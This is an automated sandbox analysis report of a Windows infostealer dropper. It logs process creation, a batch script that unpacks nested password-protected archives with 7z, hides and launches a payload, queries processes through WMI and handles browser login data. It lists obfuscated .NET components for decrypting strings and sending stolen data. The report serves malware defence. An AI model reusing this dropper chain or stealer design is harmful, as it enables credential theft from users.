Windows Analysis Report
jjjUC5ggb2nQMb1B6SvBkwmT.exe

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: String function: 004029A6 appears 44 times

Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe

Static PE information: invalid certificate

Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998794706.00000000027D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998794706.00000000027D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998794706.00000000027D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.dll, vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998563092.0000000006A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.exe, vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998563092.0000000006A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998563092.0000000006A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998563092.0000000006A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.dll, vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameStatPlus6.exe0 vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.2003623399.0000000002550000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.exe, vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe	Binary or memory string: OriginalFilenameStatPlus6.exe0 vs jjjUC5ggb2nQMb1B6SvBkwmT.exe

Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: in.exe.9.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.cs	Cryptographic APIs: 'CreateDecryptor'
Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.cs	Cryptographic APIs: 'CreateDecryptor'
Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.cs	Cryptographic APIs: 'CreateDecryptor'
Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/22@0/1

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00409606

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 5_2_0045AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		5_2_0045AC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 5_2_00461D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,FindCloseChangeNotification,		5_2_00461D04

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_0040122A GetDiskFreeSpaceExW,SendMessageW,

0_2_0040122A

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,

0_2_004092C1

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

0_2_004020BF

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

File created: C:\Users\user\AppData\Local\Temp\main

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: in.exe, 0000000B.00000002.2139768224.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.0000000002D6D000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.0000000002D57000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

File read: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Source: unknown	Process created: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe "C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe"
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p324051139125346723019431074 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p324051139125346723019431074 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"	Jump to behavior

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ureg.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Google Chrome.lnk.11.dr

LNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains method to dynamically call methods (often used by packers)

Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe

Static file information: File size 3221440 > 1048576

Data Obfuscation

Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.cs

.Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.l5dizeUqZ0(16777436)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.l5dizeUqZ0(16777258)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.l5dizeUqZ0(16777301))})

Source: in.exe.9.dr

Static PE information: 0x86B99492 [Fri Aug 16 23:38:58 2041 UTC]

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_00402665

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Code function: 0_2_004192C0 push eax; ret	0_2_004192EE
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 5_2_0047676A push rcx; ret	5_2_0047676B
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Code function: 11_2_00E550BD push es; ret	11_2_00E550C4
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Code function: 11_2_04E7066C push ss; retf	11_2_04E70670
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Code function: 11_2_04E7BBC8 push esp; iretd	11_2_04E7BBC9
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Code function: 11_2_05101063 push edx; retf	11_2_05101064
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Code function: 11_2_06461015 push FFFFFF8Bh; ret	11_2_0646101A

Source: in.exe.9.dr

Static PE information: section name: .text entropy: 7.362711891972509

Source: in.exe.9.dr, AesFastEngine.cs	High entropy of concatenated method names: 'Shift', 'FFmulX', 'Inv_Mcol', 'SubWord', 'GenerateWorkingKey', 'Init', 'GetBlockSize', 'ProcessBlock', 'Reset', 'UnPackBlock'
Source: in.exe.9.dr, UserExt.cs	High entropy of concatenated method names: 'DomainExists', 'PreCheck', 'NMdP6dBfO1y9yPTTP8B', 'BtlJSiBygSArVP8byYT', 'cwdr4PBqWm76X1Ogxmk', 'xred9VBNW4LbnxifewC', 'gMhma0B8osGVhSgiI37', 'iQuLndBU3ZMWkguQXvv', 'fW8giDBFGBjRdaCcHIS', 'iqiYoABwEWA6IFP67Oh'
Source: in.exe.9.dr, Tables8kGcmMultiplier.cs	High entropy of concatenated method names: 'Init', 'MultiplyH', 'za2eNGNJbXAumtCuKjH', 'G9wbwnNPgu2BQG4WyDP', 'CsuiZANonfen0rHLVUw', 'I61A4cN3yxqJBkue3WH', 'rHILQwNIxhBAKGBBEbQ', 'p7K6XUNWWSFhEDOBxHX', 'sGYT5aNmLtHSa0ZgerX', 'dwhXjINKiJ8klN8rMMw'
Source: in.exe.9.dr, StringDecrypt.cs	High entropy of concatenated method names: 'Xor', 'FromBase64', 'BytesToStringConverted', 'Read', 'Ka3Fj2UkunFubTyvnJ4', 'TLeCP0U7yaFCIiJmdHl', 'XZPBnVUp94Cp8l38WdG', 'lS6pT6UvS8c7PqKQeAO', 'ToAP8JUaWdoSUMoUlkA', 'dmItCsUQYBDWryXBYg9'
Source: in.exe.9.dr, Form1.cs	High entropy of concatenated method names: 'Dispose', 'InitializeComponent', 'U1CnBHVq8tbcYFCfkfo', 'sXEZgmVfLKMJUvoo6b4', 'b2l7gWVN8xps47gifdW', 'o1SOOUXzhcAjdQAVrm3', 'OhktNRVyVbitLdJOOuC', 'G12RTAV8hPd41iaH7Sx', 'IVd6fkVUGYTiZ11arAh', 'KkSe07VFmO5nmRCGdNQ'
Source: in.exe.9.dr, FullInfoSender.cs	High entropy of concatenated method names: 'Invoker', 'sdfk8h34', 'Visible', 'asdk9y3', 'kadsoji83', 'kkdhfakdasd', 'sdfm83kjasd', 'sdfkas83', 'gkdsi8y234', 'sf34asd21'
Source: in.exe.9.dr, AesGcm256.cs	High entropy of concatenated method names: 'Decrypt', 'yFaLd9UfoLpPPR6N82Z', 'bhCFK0UNSl6DhLc6nQ8', 'omkA3TU8r8r1ZTprlmk', 'qXWZJIUUDMwW2JXjiAA', 'Yy8NnSUF2tmloe9ArN7', 'Bl5BmhUw0JvgY2OKFm2', 'gSC2qHUXj9etiIOBOOi', 'ginPl1Uy6tPU5lOsjfq', 'PHmyqfUqy86dCcYPhax'
Source: in.exe.9.dr, PartsSender.cs	High entropy of concatenated method names: 'Invoker', 'sdf9j3nasd', 'Visible', 'LSIDsd2', 'asdkadu8', 'sdfo8n234', 'sdfi35sdf', 'asd44123', 'fdfg9i3jn4', 'sdf934asd'
Source: in.exe.9.dr, EnvironmentChecker.cs	High entropy of concatenated method names: 'Check', 'FindLinksAndSetProxy', 'InstallCert', 'qPCgxiB2oUhfRZfgBu7', 'uFeXq0B9BPbYEuYtrmx', 'OcpwLUB6BEfIGmgpwWT', 'VKV512BjPGvJIIiHeQB', 'VaC24NBQVDwauM6G1kt', 'WxGJt1BZHadkXE9MPJl', 'o4rWnEBkrvG12vVZSGb'
Source: in.exe.9.dr, QueryProcessor.cs	High entropy of concatenated method names: 'GatherValue', 'ReadMasterOfContext', 'ReadContextTable', 'GetOffset', 'ReadContextValue', 'ConvertToULong', 'Count', 'Gvl', 'Cvl', 'IsOdd'
Source: in.exe.9.dr, BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO.cs	High entropy of concatenated method names: 'Dispose', 'aIBB0j2e9yddmSm0Quc', 'HBZATj22hFg4nV4xYKR', 'AlZxPX29FvQv9ChqCMR', 'X6Xd0D261MKEwe6vB01', 'fQltEe2juNTAdAD4xTW', 'SE9LaP2Qb47E0O6PnG7', 'k6yH212CuSuxLQ4iVR3', 'fRePJP2BBhsfiGmdPjL', 'hsmXsS2Zk3guPmdXfFI'
Source: in.exe.9.dr, Json.cs	High entropy of concatenated method names: 'FromJSON', 'ToJSON', 'GAIIkZCAprOdmZGt07D', 'H31rLiC5bq8mnqGTmeK', 'txrsWACtq970qQTbSwR', 'zWjqFpC48PU51FXZDgN', 'cLldBOCd371NPb4AE6Y', 'tZNFewCH7vkCZON022Y', 'jUxbJSCIR98D5xTT7g9'
Source: in.exe.9.dr, GcmBlockCipher.cs	High entropy of concatenated method names: 'GetBlockSize', 'Init', 'GetMac', 'GetOutputSize', 'GetUpdateOutputSize', 'ProcessByte', 'ProcessBytes', 'Process', 'DoFinal', 'Reset'
Source: in.exe.9.dr, FileExt.cs	High entropy of concatenated method names: 'ReadFile', 'ReadFileAsText', 'hhavFtCrI2Pj5dUY462', 'WRq9A7Clkmx1c6MBeya', 'aGxKgyCSjkZJT5vB6s4', 'R6PTv5CibwL0NFKTJ06', 'oP5xOKCLo7WviKOgwxr', 'Pmp9FOCGQsqAwF6tDQ5', 'RlptJ1ChFxAUh2tqXMx', 'OOQOSwCMY8cXaRgdwbu'
Source: in.exe.9.dr, SystemInfoHelper.cs	High entropy of concatenated method names: 'CloseBrowser', 'GetProcessors', 'GetGraphicCards', 'GetBrowsers', 'GetSerialNumber', 'QueryProc', 'QueryAV', 'QueryProc', 'ListOfPrograms', 'AvailableLanguages'
Source: in.exe.9.dr, GcmUtilities.cs	High entropy of concatenated method names: 'OneAsBytes', 'OneAsUints', 'AsUints', 'Multiply', 'MultiplyP', 'MultiplyP8', 'ShiftRight', 'ShiftRight', 'ShiftRightN', 'Xor'
Source: in.exe.9.dr, IPv4Helper.cs	High entropy of concatenated method names: 'IsLocalIp', 'GetDefaultIPv4Address', 'Request', 'v4snoYBo1Zns3PeQv7Y', 'Y7fjQ0BJ2MomcSeHpJU', 'IMfaHOBPUT9Eb0QXioX', 'vmIEC5B31mQZ2eYCtT8', 'SGmC8oBmjCbSDwYpOlQ', 'ICfO3CBKGH2SrtUSSEn', 'EkLjq9BbSTEYEyuK15h'
Source: in.exe.9.dr, Entity19.cs	High entropy of concatenated method names: 'Id1', 'Id2', 'Id3', 'e2NL75fVDe6gGM94P22', 'DsGiAhfCKPq6I24qD59', 'eFBqLGfB9QCLL11eCjg', 'YuAbj8fe7lDlGfAWnmF', 'eanD1af2Bw2RSuv6oOt', 'dRkZ6Bf93LwSBOvLJML', 'jwgNC6f6G4PQln9eQCi'
Source: in.exe.9.dr, QueryCmd.cs	High entropy of concatenated method names: 'IsTrue', 'Query', 'nD7n6GV5839C33pU3PP', 'WLC1ycVdgU1xIjt2mfs', 'IKTkBeVHTBO909oOp4p', 'JZONa9VIjqZvm0TslPo', 'rrR9PoVWXeF8CZ9Rc54', 'xebPdDVJaPqCH2oYNSB', 'JMedFpVPgjdfy40mYhV', 'hkPoisVooEcf8FUJA26'
